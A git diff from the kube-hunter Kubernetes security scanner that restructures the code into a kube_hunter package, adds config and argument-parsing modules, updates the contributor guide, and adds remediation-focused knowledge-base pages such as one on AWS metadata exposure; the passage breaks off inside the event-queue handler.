Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
|
||||
|
||||
Disable the readonly port by using `--read-only-port=0` kubelet flag.
|
||||
|
||||
## References
|
||||
|
||||
- [Kubelet configuration](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
|
||||
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
|
||||
25
docs/_kb/KHV053.md
Normal file
25
docs/_kb/KHV053.md
Normal file
@@ -0,0 +1,25 @@
|
||||
---
|
||||
vid: KHV053
|
||||
title: AWS Metadata Exposure
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
## Issue description
|
||||
|
||||
AWS EC2 provides an internal HTTP endpoint that exposes information from the cloud platform to workloads running in an instance. The endpoint is accessible to every workload running in the instance. An attacker that is able to execute a pod in the cluster may be able to query the metadata service and discover additional information about the environment.
|
||||
|
||||
## Remediation
|
||||
|
||||
* Limit access to the instance metadata service. Consider using a local firewall such as `iptables` to disable access from some or all processes/users to the instance metadata service.
|
||||
|
||||
* Disable the metadata service (via instance metadata options or IAM), or at a minimum enforce the use IMDSv2 on an instance to require token-based access to the service.
|
||||
|
||||
* Modify the HTTP PUT response hop limit on the instance to 1. This will only allow access to the service from the instance itself rather than from within a pod.
|
||||
|
||||
## References
|
||||
|
||||
- [AWS Instance Metadata service](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)
|
||||
- [EC2 Instance Profiles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)
|
||||
@@ -1,17 +0,0 @@
|
||||
from os.path import basename
|
||||
import glob
|
||||
|
||||
def get_py_files(path):
|
||||
for py_file in glob.glob("{}*.py".format(path)):
|
||||
if not py_file.endswith("__init__.py"):
|
||||
yield basename(py_file)[:-3]
|
||||
|
||||
def install_static_imports(path):
|
||||
with open("{}__init__.py".format(path), 'w') as init_f:
|
||||
for pf in get_py_files(path):
|
||||
init_f.write("from .{} import *\n".format(pf))
|
||||
|
||||
install_static_imports("src/modules/discovery/")
|
||||
install_static_imports("src/modules/hunting/")
|
||||
install_static_imports("src/modules/report/")
|
||||
install_static_imports("plugins/")
|
||||
13
job.yaml
13
job.yaml
@@ -1,14 +1,17 @@
|
||||
---
|
||||
apiVersion: batch/v1
|
||||
kind: Job
|
||||
metadata:
|
||||
name: kube-hunter
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: kube-hunter
|
||||
spec:
|
||||
containers:
|
||||
- name: kube-hunter
|
||||
image: aquasec/kube-hunter
|
||||
command: ["python", "kube-hunter.py"]
|
||||
args: ["--pod"]
|
||||
- name: kube-hunter
|
||||
image: aquasec/kube-hunter:0.6.8
|
||||
command: ["kube-hunter"]
|
||||
args: ["--pod"]
|
||||
restartPolicy: Never
|
||||
backoffLimit: 4
|
||||
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 144 KiB After Width: | Height: | Size: 230 KiB |
BIN
kube-hunter.png
BIN
kube-hunter.png
Binary file not shown.
|
Before Width: | Height: | Size: 27 KiB After Width: | Height: | Size: 25 KiB |
149
kube-hunter.py
149
kube-hunter.py
@@ -1,149 +0,0 @@
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import logging
|
||||
import threading
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser(description='Kube-Hunter - hunts for security weaknesses in Kubernetes clusters')
|
||||
parser.add_argument('--list', action="store_true", help="displays all tests in kubehunter (add --active flag to see active tests)")
|
||||
parser.add_argument('--interface', action="store_true", help="set hunting of all network interfaces")
|
||||
parser.add_argument('--pod', action="store_true", help="set hunter as an insider pod")
|
||||
parser.add_argument('--quick', action="store_true", help="Prefer quick scan (subnet 24)")
|
||||
parser.add_argument('--include-patched-versions', action="store_true", help="Don't skip patched versions when scanning")
|
||||
parser.add_argument('--cidr', type=str, help="set an ip range to scan, example: 192.168.0.0/16")
|
||||
parser.add_argument('--mapping', action="store_true", help="outputs only a mapping of the cluster's nodes")
|
||||
parser.add_argument('--remote', nargs='+', metavar="HOST", default=list(), help="one or more remote ip/dns to hunt")
|
||||
parser.add_argument('--active', action="store_true", help="enables active hunting")
|
||||
parser.add_argument('--log', type=str, metavar="LOGLEVEL", default='INFO', help="set log level, options are: debug, info, warn, none")
|
||||
parser.add_argument('--report', type=str, default='plain', help="set report type, options are: plain, yaml, json")
|
||||
parser.add_argument('--dispatch', type=str, default='stdout', help="where to send the report to, options are: stdout, http (set KUBEHUNTER_HTTP_DISPATCH_URL and KUBEHUNTER_HTTP_DISPATCH_METHOD environment variables to configure)")
|
||||
parser.add_argument('--statistics', action="store_true", help="set hunting statistics")
|
||||
|
||||
import plugins
|
||||
|
||||
config = parser.parse_args()
|
||||
|
||||
try:
|
||||
loglevel = getattr(logging, config.log.upper())
|
||||
except:
|
||||
pass
|
||||
if config.log.lower() != "none":
|
||||
logging.basicConfig(level=loglevel, format='%(message)s', datefmt='%H:%M:%S')
|
||||
|
||||
from src.modules.report.plain import PlainReporter
|
||||
from src.modules.report.yaml import YAMLReporter
|
||||
from src.modules.report.json import JSONReporter
|
||||
reporters = {
|
||||
'yaml': YAMLReporter,
|
||||
'json': JSONReporter,
|
||||
'plain': PlainReporter
|
||||
}
|
||||
if config.report.lower() in reporters.keys():
|
||||
config.reporter = reporters[config.report.lower()]()
|
||||
else:
|
||||
logging.warning('Unknown reporter selected, using plain')
|
||||
config.reporter = reporters['plain']()
|
||||
|
||||
from src.modules.report.dispatchers import STDOUTDispatcher, HTTPDispatcher
|
||||
dispatchers = {
|
||||
'stdout': STDOUTDispatcher,
|
||||
'http': HTTPDispatcher
|
||||
}
|
||||
if config.dispatch.lower() in dispatchers.keys():
|
||||
config.dispatcher = dispatchers[config.dispatch.lower()]()
|
||||
else:
|
||||
logging.warning('Unknown dispatcher selected, using stdout')
|
||||
config.dispatcher = dispatchers['stdout']()
|
||||
|
||||
from src.core.events import handler
|
||||
from src.core.events.types import HuntFinished, HuntStarted
|
||||
from src.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
|
||||
import src
|
||||
|
||||
|
||||
def interactive_set_config():
|
||||
"""Sets config manually, returns True for success"""
|
||||
options = [("Remote scanning", "scans one or more specific IPs or DNS names"),
|
||||
("Interface scanning","scans subnets on all local network interfaces"),
|
||||
("IP range scanning","scans a given IP range")]
|
||||
|
||||
print("Choose one of the options below:")
|
||||
for i, (option, explanation) in enumerate(options):
|
||||
print("{}. {} ({})".format(i+1, option.ljust(20), explanation))
|
||||
choice = input("Your choice: ")
|
||||
if choice == '1':
|
||||
config.remote = input("Remotes (separated by a ','): ").replace(' ', '').split(',')
|
||||
elif choice == '2':
|
||||
config.interface = True
|
||||
elif choice == '3':
|
||||
config.cidr = input("CIDR (example - 192.168.1.0/24): ").replace(' ', '')
|
||||
else:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def list_hunters():
|
||||
print("\nPassive Hunters:\n----------------")
|
||||
for hunter, docs in handler.passive_hunters.items():
|
||||
name, doc = hunter.parse_docs(docs)
|
||||
print("* {}\n {}\n".format(name, doc))
|
||||
|
||||
if config.active:
|
||||
print("\n\nActive Hunters:\n---------------")
|
||||
for hunter, docs in handler.active_hunters.items():
|
||||
name, doc = hunter.parse_docs(docs)
|
||||
print("* {}\n {}\n".format( name, doc))
|
||||
|
||||
|
||||
global hunt_started_lock
|
||||
hunt_started_lock = threading.Lock()
|
||||
hunt_started = False
|
||||
|
||||
|
||||
def main():
|
||||
global hunt_started
|
||||
scan_options = [
|
||||
config.pod,
|
||||
config.cidr,
|
||||
config.remote,
|
||||
config.interface
|
||||
]
|
||||
try:
|
||||
if config.list:
|
||||
list_hunters()
|
||||
return
|
||||
|
||||
if not any(scan_options):
|
||||
if not interactive_set_config(): return
|
||||
|
||||
with hunt_started_lock:
|
||||
hunt_started = True
|
||||
handler.publish_event(HuntStarted())
|
||||
if config.pod:
|
||||
handler.publish_event(RunningAsPodEvent())
|
||||
else:
|
||||
handler.publish_event(HostScanEvent())
|
||||
|
||||
# Blocking to see discovery output
|
||||
handler.join()
|
||||
except KeyboardInterrupt:
|
||||
logging.debug("Kube-Hunter stopped by user")
|
||||
# happens when running a container without interactive option
|
||||
except EOFError:
|
||||
logging.error("\033[0;31mPlease run again with -it\033[0m")
|
||||
finally:
|
||||
hunt_started_lock.acquire()
|
||||
if hunt_started:
|
||||
hunt_started_lock.release()
|
||||
handler.publish_event(HuntFinished())
|
||||
handler.join()
|
||||
handler.free()
|
||||
logging.debug("Cleaned Queue")
|
||||
else:
|
||||
hunt_started_lock.release()
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
|
||||
1
kube-hunter.py
Symbolic link
1
kube-hunter.py
Symbolic link
@@ -0,0 +1 @@
|
||||
kube_hunter/__main__.py
|
||||
@@ -5,9 +5,7 @@ First, let's go through kube-hunter's basic architecture.
|
||||
### Directory Structure
|
||||
~~~
|
||||
kube-hunter/
|
||||
plugins/
|
||||
# your plugin
|
||||
src/
|
||||
kube_hunter/
|
||||
core/
|
||||
modules/
|
||||
discovery/
|
||||
@@ -16,7 +14,7 @@ kube-hunter/
|
||||
# your module
|
||||
report/
|
||||
# your module
|
||||
kube-hunter.py
|
||||
__main__.py
|
||||
~~~
|
||||
### Design Pattern
|
||||
Kube-hunter is built with the [Observer Pattern](https://en.wikipedia.org/wiki/Observer_pattern).
|
||||
@@ -77,10 +75,10 @@ in order to prevent circular dependency bug.
|
||||
|
||||
Following the above example, let's figure out the imports:
|
||||
```python
|
||||
from ...core.types import Hunter
|
||||
from ...core.events import handler
|
||||
from kube_hunter.core.types import Hunter
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
|
||||
from ...core.events.types import OpenPortEvent
|
||||
from kube_hunter.core.events.types import OpenPortEvent
|
||||
|
||||
@handler.subscribe(OpenPortEvent, predicate=lambda event: event.port == 30000)
|
||||
class KubeDashboardDiscovery(Hunter):
|
||||
@@ -92,13 +90,13 @@ class KubeDashboardDiscovery(Hunter):
|
||||
As you can see, all of the types here come from the `core` module.
|
||||
|
||||
### Core Imports
|
||||
relative import: `...core.events`
|
||||
Absolute import: `kube_hunter.core.events`
|
||||
|
||||
|Name|Description|
|
||||
|---|---|
|
||||
|handler|Core object for using events, every module should import this object|
|
||||
|
||||
relative import `...core.events.types`
|
||||
Absolute import `kube_hunter.core.events.types`
|
||||
|
||||
|Name|Description|
|
||||
|---|---|
|
||||
@@ -106,7 +104,7 @@ relative import `...core.events.types`
|
||||
|Vulnerability|Base class for defining a new vulnerability|
|
||||
|OpenPortEvent|Published when a new port is discovered. open port is assigned to the `port ` attribute|
|
||||
|
||||
relative import: `...core.types`
|
||||
Absolute import: `kube_hunter.core.types`
|
||||
|
||||
|Type|Description|
|
||||
|---|---|
|
||||
@@ -192,7 +190,7 @@ To prove a vulnerability, create an `ActiveHunter` that is subscribed to the vul
|
||||
A filter can change an event's attribute or remove it completely before it gets published to Hunters.
|
||||
|
||||
To create a filter:
|
||||
* create a class that inherits from `EventFilterBase` (from `src.core.events.types`)
|
||||
* create a class that inherits from `EventFilterBase` (from `kube_hunter.core.events.types`)
|
||||
* use `@handler.subscribe(Event)` to filter a specific `Event`
|
||||
* define a `__init__(self, event)` method, and save the event in your class
|
||||
* implement `self.execute(self)` method, __returns a new event, or None to remove event__
|
||||
@@ -206,10 +204,10 @@ To prevent an event from being published, return `None` from the execute method
|
||||
To alter event attributes, return a new event, based on the `self.event` after your modifications, it will replace the event itself before it is published.
|
||||
__Make sure to return the event from the execute method, or the event will not get published__
|
||||
|
||||
For example, if you don't want to hunt services found on a localhost IP, you can create the following module, in the `src/modules/report/`
|
||||
For example, if you don't want to hunt services found on a localhost IP, you can create the following module, in the `kube_hunter/modules/report/`
|
||||
```python
|
||||
from src.core.events import handler
|
||||
from src.core.events.types import Service, EventFilterBase
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Service, EventFilterBase
|
||||
|
||||
@handler.subscribe(Service)
|
||||
class LocalHostFilter(EventFilterBase):
|
||||
@@ -224,9 +222,9 @@ That means other Hunters that are subscribed to this Service will not get trigge
|
||||
That opens up a wide variety of possible operations, as this not only can __filter out__ events, but you can actually __change event attributes__, for example:
|
||||
|
||||
```python
|
||||
from src.core.events import handler
|
||||
from src.core.types import InformationDisclosure
|
||||
from src.core.events.types import Vulnerability, EventFilterBase
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.types import InformationDisclosure
|
||||
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
|
||||
|
||||
@handler.subscribe(Vulnerability)
|
||||
class CensorInformation(EventFilterBase):
|
||||
@@ -247,5 +245,5 @@ __Note: In filters, you should not change attributes in the event.previous. This
|
||||
Although we haven't been rigorous about this in the past, please add tests to support your code changes. Tests are executed like this:
|
||||
|
||||
```bash
|
||||
python runtest.py
|
||||
pytest
|
||||
```
|
||||
0
kube_hunter/__init__.py
Normal file
0
kube_hunter/__init__.py
Normal file
143
kube_hunter/__main__.py
Executable file
143
kube_hunter/__main__.py
Executable file
@@ -0,0 +1,143 @@
|
||||
#!/usr/bin/env python3
|
||||
# flake8: noqa: E402
|
||||
|
||||
from functools import partial
|
||||
import logging
|
||||
import threading
|
||||
|
||||
from kube_hunter.conf import Config, set_config
|
||||
from kube_hunter.conf.parser import parse_args
|
||||
from kube_hunter.conf.logging import setup_logger
|
||||
|
||||
from kube_hunter.plugins import initialize_plugin_manager
|
||||
|
||||
pm = initialize_plugin_manager()
|
||||
# Using a plugin hook for adding arguments before parsing
|
||||
args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
|
||||
config = Config(
|
||||
active=args.active,
|
||||
cidr=args.cidr,
|
||||
include_patched_versions=args.include_patched_versions,
|
||||
interface=args.interface,
|
||||
log_file=args.log_file,
|
||||
mapping=args.mapping,
|
||||
network_timeout=args.network_timeout,
|
||||
num_worker_threads=args.num_worker_threads,
|
||||
pod=args.pod,
|
||||
quick=args.quick,
|
||||
remote=args.remote,
|
||||
statistics=args.statistics,
|
||||
k8s_auto_discover_nodes=args.k8s_auto_discover_nodes,
|
||||
service_account_token=args.service_account_token,
|
||||
kubeconfig=args.kubeconfig,
|
||||
enable_cve_hunting=args.enable_cve_hunting,
|
||||
custom=args.custom,
|
||||
)
|
||||
setup_logger(args.log, args.log_file)
|
||||
set_config(config)
|
||||
|
||||
# Running all other registered plugins before execution
|
||||
pm.hook.load_plugin(args=args)
|
||||
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import HuntFinished, HuntStarted
|
||||
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
|
||||
from kube_hunter.modules.report import get_reporter, get_dispatcher
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
config.dispatcher = get_dispatcher(args.dispatch)
|
||||
config.reporter = get_reporter(args.report)
|
||||
|
||||
|
||||
def interactive_set_config():
|
||||
"""Sets config manually, returns True for success"""
|
||||
options = [
|
||||
("Remote scanning", "scans one or more specific IPs or DNS names"),
|
||||
("Interface scanning", "scans subnets on all local network interfaces"),
|
||||
("IP range scanning", "scans a given IP range"),
|
||||
]
|
||||
|
||||
print("Choose one of the options below:")
|
||||
for i, (option, explanation) in enumerate(options):
|
||||
print("{}. {} ({})".format(i + 1, option.ljust(20), explanation))
|
||||
choice = input("Your choice: ")
|
||||
if choice == "1":
|
||||
config.remote = input("Remotes (separated by a ','): ").replace(" ", "").split(",")
|
||||
elif choice == "2":
|
||||
config.interface = True
|
||||
elif choice == "3":
|
||||
config.cidr = (
|
||||
input("CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): ")
|
||||
.replace(" ", "")
|
||||
.split(",")
|
||||
)
|
||||
else:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def list_hunters(class_names=False):
|
||||
print("\nPassive Hunters:\n----------------")
|
||||
for hunter, docs in handler.passive_hunters.items():
|
||||
name, doc = hunter.parse_docs(docs)
|
||||
if class_names:
|
||||
name = hunter.__name__
|
||||
print(f"* {name}\n {doc}\n")
|
||||
|
||||
if config.active:
|
||||
print("\n\nActive Hunters:\n---------------")
|
||||
for hunter, docs in handler.active_hunters.items():
|
||||
name, doc = hunter.parse_docs(docs)
|
||||
if class_names:
|
||||
name = hunter.__name__
|
||||
print(f"* {name}\n {doc}\n")
|
||||
|
||||
|
||||
hunt_started_lock = threading.Lock()
|
||||
hunt_started = False
|
||||
|
||||
|
||||
def main():
|
||||
global hunt_started
|
||||
scan_options = [config.pod, config.cidr, config.remote, config.interface, config.k8s_auto_discover_nodes]
|
||||
try:
|
||||
if args.list:
|
||||
if args.raw_hunter_names:
|
||||
list_hunters(class_names=True)
|
||||
else:
|
||||
list_hunters()
|
||||
return
|
||||
|
||||
if not any(scan_options):
|
||||
if not interactive_set_config():
|
||||
return
|
||||
|
||||
with hunt_started_lock:
|
||||
hunt_started = True
|
||||
handler.publish_event(HuntStarted())
|
||||
if config.pod:
|
||||
handler.publish_event(RunningAsPodEvent())
|
||||
else:
|
||||
handler.publish_event(HostScanEvent())
|
||||
|
||||
# Blocking to see discovery output
|
||||
handler.join()
|
||||
except KeyboardInterrupt:
|
||||
logger.debug("Kube-Hunter stopped by user")
|
||||
# happens when running a container without interactive option
|
||||
except EOFError:
|
||||
logger.error("\033[0;31mPlease run again with -it\033[0m")
|
||||
finally:
|
||||
hunt_started_lock.acquire()
|
||||
if hunt_started:
|
||||
hunt_started_lock.release()
|
||||
handler.publish_event(HuntFinished())
|
||||
handler.join()
|
||||
handler.free()
|
||||
logger.debug("Cleaned Queue")
|
||||
else:
|
||||
hunt_started_lock.release()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
66
kube_hunter/conf/__init__.py
Normal file
66
kube_hunter/conf/__init__.py
Normal file
@@ -0,0 +1,66 @@
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any, Optional
|
||||
|
||||
|
||||
def get_default_core_hunters():
|
||||
return ["FromPodHostDiscovery", "HostDiscovery", "PortDiscovery", "SendFullReport", "Collector", "StartedInfo"]
|
||||
|
||||
|
||||
@dataclass
|
||||
class Config:
|
||||
"""Config is a configuration container.
|
||||
It contains the following fields:
|
||||
- active: Enable active hunters
|
||||
- cidr: Network subnets to scan
|
||||
- dispatcher: Dispatcher object
|
||||
- include_patched_version: Include patches in version comparison
|
||||
- interface: Interface scanning mode
|
||||
- list_hunters: Print a list of existing hunters
|
||||
- log_level: Log level
|
||||
- log_file: Log File path
|
||||
- mapping: Report only found components
|
||||
- network_timeout: Timeout for network operations
|
||||
- num_worker_threads: Add a flag --threads to change the default 800 thread count of the event handler
|
||||
- pod: From pod scanning mode
|
||||
- quick: Quick scanning mode
|
||||
- remote: Hosts to scan
|
||||
- report: Output format
|
||||
- statistics: Include hunters statistics
|
||||
- enable_cve_hunting: enables cve hunting, shows cve results
|
||||
"""
|
||||
|
||||
active: bool = False
|
||||
cidr: Optional[str] = None
|
||||
dispatcher: Optional[Any] = None
|
||||
include_patched_versions: bool = False
|
||||
interface: bool = False
|
||||
log_file: Optional[str] = None
|
||||
mapping: bool = False
|
||||
network_timeout: float = 5.0
|
||||
num_worker_threads: int = 800
|
||||
pod: bool = False
|
||||
quick: bool = False
|
||||
remote: Optional[str] = None
|
||||
reporter: Optional[Any] = None
|
||||
statistics: bool = False
|
||||
k8s_auto_discover_nodes: bool = False
|
||||
service_account_token: Optional[str] = None
|
||||
kubeconfig: Optional[str] = None
|
||||
enable_cve_hunting: bool = False
|
||||
custom: Optional[list] = None
|
||||
raw_hunter_names: bool = False
|
||||
core_hunters: list = field(default_factory=get_default_core_hunters)
|
||||
|
||||
|
||||
_config: Optional[Config] = None
|
||||
|
||||
|
||||
def get_config() -> Config:
|
||||
if not _config:
|
||||
raise ValueError("Configuration is not initialized")
|
||||
return _config
|
||||
|
||||
|
||||
def set_config(new_config: Config) -> None:
|
||||
global _config
|
||||
_config = new_config
|
||||
25
kube_hunter/conf/logging.py
Normal file
25
kube_hunter/conf/logging.py
Normal file
@@ -0,0 +1,25 @@
|
||||
import logging
|
||||
|
||||
DEFAULT_LEVEL = logging.INFO
|
||||
DEFAULT_LEVEL_NAME = logging.getLevelName(DEFAULT_LEVEL)
|
||||
LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s %(message)s"
|
||||
|
||||
|
||||
def setup_logger(level_name, logfile):
|
||||
# Remove any existing handlers
|
||||
# Unnecessary in Python 3.8 since `logging.basicConfig` has `force` parameter
|
||||
for h in logging.getLogger().handlers[:]:
|
||||
h.close()
|
||||
logging.getLogger().removeHandler(h)
|
||||
|
||||
if level_name.upper() == "NONE":
|
||||
logging.disable(logging.CRITICAL)
|
||||
else:
|
||||
log_level = getattr(logging, level_name.upper(), None)
|
||||
log_level = log_level if isinstance(log_level, int) else None
|
||||
if logfile is None:
|
||||
logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
|
||||
else:
|
||||
logging.basicConfig(filename=logfile, level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
|
||||
if not log_level:
|
||||
logging.warning(f"Unknown log level '{level_name}', using {DEFAULT_LEVEL_NAME}")
|
||||
159
kube_hunter/conf/parser.py
Normal file
159
kube_hunter/conf/parser.py
Normal file
@@ -0,0 +1,159 @@
|
||||
from argparse import ArgumentParser
|
||||
from kube_hunter.plugins import hookimpl
|
||||
|
||||
|
||||
@hookimpl
|
||||
def parser_add_arguments(parser):
|
||||
"""
|
||||
This is the default hook implementation for parse_add_argument
|
||||
Contains initialization for all default arguments
|
||||
"""
|
||||
parser.add_argument(
|
||||
"--list",
|
||||
action="store_true",
|
||||
help="Displays all tests in kubehunter (add --active flag to see active tests)",
|
||||
)
|
||||
|
||||
parser.add_argument("--interface", action="store_true", help="Set hunting on all network interfaces")
|
||||
|
||||
parser.add_argument("--pod", action="store_true", help="Set hunter as an insider pod")
|
||||
|
||||
parser.add_argument("--quick", action="store_true", help="Prefer quick scan (subnet 24)")
|
||||
|
||||
parser.add_argument(
|
||||
"--include-patched-versions",
|
||||
action="store_true",
|
||||
help="Don't skip patched versions when scanning",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--cidr",
|
||||
type=str,
|
||||
help="Set an IP range to scan/ignore, example: '192.168.0.0/24,!192.168.0.8/32,!192.168.0.16/32'",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--mapping",
|
||||
action="store_true",
|
||||
help="Outputs only a mapping of the cluster's nodes",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--remote",
|
||||
nargs="+",
|
||||
metavar="HOST",
|
||||
default=list(),
|
||||
help="One or more remote ip/dns to hunt",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"-c",
|
||||
"--custom",
|
||||
nargs="+",
|
||||
metavar="HUNTERS",
|
||||
default=list(),
|
||||
help="Custom hunting. Only given hunter names will register in the hunt."
|
||||
"for a list of options run `--list --raw-hunter-names`",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--raw-hunter-names",
|
||||
action="store_true",
|
||||
help="Use in combination with `--list` to display hunter class names to pass for custom hunting flag",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--k8s-auto-discover-nodes",
|
||||
action="store_true",
|
||||
help="Enables automatic detection of all nodes in a Kubernetes cluster "
|
||||
"by quering the Kubernetes API server. "
|
||||
"It supports both in-cluster config (when running as a pod), "
|
||||
"and a specific kubectl config file (use --kubeconfig to set this). "
|
||||
"By default, when this flag is set, it will use in-cluster config. "
|
||||
"NOTE: this is automatically switched on in --pod mode.",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--service-account-token",
|
||||
type=str,
|
||||
metavar="JWT_TOKEN",
|
||||
help="Manually specify the service account jwt token to use for authenticating in the hunting process "
|
||||
"NOTE: This overrides the loading of the pod's bounded authentication when running in --pod mode",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--kubeconfig",
|
||||
type=str,
|
||||
metavar="KUBECONFIG",
|
||||
default=None,
|
||||
help="Specify the kubeconfig file to use for Kubernetes nodes auto discovery "
|
||||
" (to be used in conjuction with the --k8s-auto-discover-nodes flag.",
|
||||
)
|
||||
|
||||
parser.add_argument("--active", action="store_true", help="Enables active hunting")
|
||||
|
||||
parser.add_argument(
|
||||
"--enable-cve-hunting",
|
||||
action="store_true",
|
||||
help="Show cluster CVEs based on discovered version (Depending on different vendors, may result in False Positives)",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--log",
|
||||
type=str,
|
||||
metavar="LOGLEVEL",
|
||||
default="INFO",
|
||||
help="Set log level, options are: debug, info, warn, none",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--log-file",
|
||||
type=str,
|
||||
default=None,
|
||||
help="Path to a log file to output all logs to",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--report",
|
||||
type=str,
|
||||
default="plain",
|
||||
help="Set report type, options are: plain, yaml, json",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--dispatch",
|
||||
type=str,
|
||||
default="stdout",
|
||||
help="Where to send the report to, options are: "
|
||||
"stdout, http (set KUBEHUNTER_HTTP_DISPATCH_URL and "
|
||||
"KUBEHUNTER_HTTP_DISPATCH_METHOD environment variables to configure)",
|
||||
)
|
||||
|
||||
parser.add_argument("--statistics", action="store_true", help="Show hunting statistics")
|
||||
|
||||
parser.add_argument("--network-timeout", type=float, default=5.0, help="network operations timeout")
|
||||
|
||||
parser.add_argument(
|
||||
"--num-worker-threads",
|
||||
type=int,
|
||||
default=800,
|
||||
help="In some environments the default thread count (800) can cause the process to crash. "
|
||||
"In the case of a crash try lowering the thread count",
|
||||
)
|
||||
|
||||
|
||||
def parse_args(add_args_hook):
|
||||
"""
|
||||
Function handles all argument parsing
|
||||
|
||||
@param add_arguments: hook for adding arguments to it's given ArgumentParser parameter
|
||||
@return: parsed arguments dict
|
||||
"""
|
||||
parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
|
||||
# adding all arguments to the parser
|
||||
add_args_hook(parser=parser)
|
||||
|
||||
args = parser.parse_args()
|
||||
if args.cidr:
|
||||
args.cidr = args.cidr.replace(" ", "").split(",")
|
||||
return args
|
||||
@@ -1,2 +1,3 @@
|
||||
# flake8: noqa: E402
|
||||
from . import types
|
||||
from . import events
|
||||
2
kube_hunter/core/events/__init__.py
Normal file
2
kube_hunter/core/events/__init__.py
Normal file
@@ -0,0 +1,2 @@
|
||||
# flake8: noqa: E402
|
||||
from . import types
|
||||
370
kube_hunter/core/events/event_handler.py
Normal file
370
kube_hunter/core/events/event_handler.py
Normal file
@@ -0,0 +1,370 @@
|
||||
import logging
|
||||
import time
|
||||
from collections import defaultdict
|
||||
from queue import Queue
|
||||
from threading import Thread
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.types import ActiveHunter, HunterBase
|
||||
from kube_hunter.core.events.types import Vulnerability, EventFilterBase, MultipleEventsContainer
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
# Inherits Queue object, handles events asynchronously
|
||||
class EventQueue(Queue):
|
||||
def __init__(self, num_worker=10):
|
||||
super().__init__()
|
||||
self.passive_hunters = dict()
|
||||
self.active_hunters = dict()
|
||||
self.all_hunters = dict()
|
||||
|
||||
self.running = True
|
||||
self.workers = list()
|
||||
|
||||
# -- Regular Subscription --
|
||||
# Structure: key: Event Class, value: tuple(Registered Hunter, Predicate Function)
|
||||
self.hooks = defaultdict(list)
|
||||
self.filters = defaultdict(list)
|
||||
# --------------------------
|
||||
|
||||
# -- Multiple Subscription --
|
||||
# Structure: key: Event Class, value: tuple(Registered Hunter, Predicate Function)
|
||||
self.multi_hooks = defaultdict(list)
|
||||
|
||||
# When subscribing to multiple events, this gets populated with required event classes
|
||||
# Structure: key: Hunter Class, value: set(RequiredEventClass1, RequiredEventClass2)
|
||||
self.hook_dependencies = defaultdict(set)
|
||||
|
||||
# To keep track of fulfilled dependencies. we need to have a structure which saves historical instanciated
|
||||
# events mapped to a registered hunter.
|
||||
# We used a 2 dimensional dictionary in order to fulfill two demands:
|
||||
# * correctly count published required events
|
||||
# * save historical events fired, easily sorted by their type
|
||||
#
|
||||
# Structure: hook_fulfilled_deps[hunter_class] -> fulfilled_events_for_hunter[event_class] -> [EventObject, EventObject2]
|
||||
self.hook_fulfilled_deps = defaultdict(lambda: defaultdict(list))
|
||||
# ---------------------------
|
||||
|
||||
for _ in range(num_worker):
|
||||
t = Thread(target=self.worker)
|
||||
t.daemon = True
|
||||
t.start()
|
||||
self.workers.append(t)
|
||||
|
||||
t = Thread(target=self.notifier)
|
||||
t.daemon = True
|
||||
t.start()
|
||||
|
||||
"""
|
||||
######################################################
|
||||
+ ----------------- Public Methods ----------------- +
|
||||
######################################################
|
||||
"""
|
||||
|
||||
def subscribe(self, event, hook=None, predicate=None, is_register=True):
|
||||
"""
|
||||
The Subscribe Decorator - For Regular Registration
|
||||
Use this to register for one event only. Your hunter will execute each time this event is published
|
||||
|
||||
@param event - Event class to subscribe to
|
||||
@param predicate - Optional: Function that will be called with the published event as a parameter before trigger.
|
||||
If it's return value is False, the Hunter will not run (default=None).
|
||||
@param hook - Hunter class to register for (ignore when using as a decorator)
|
||||
"""
|
||||
|
||||
def wrapper(hook):
|
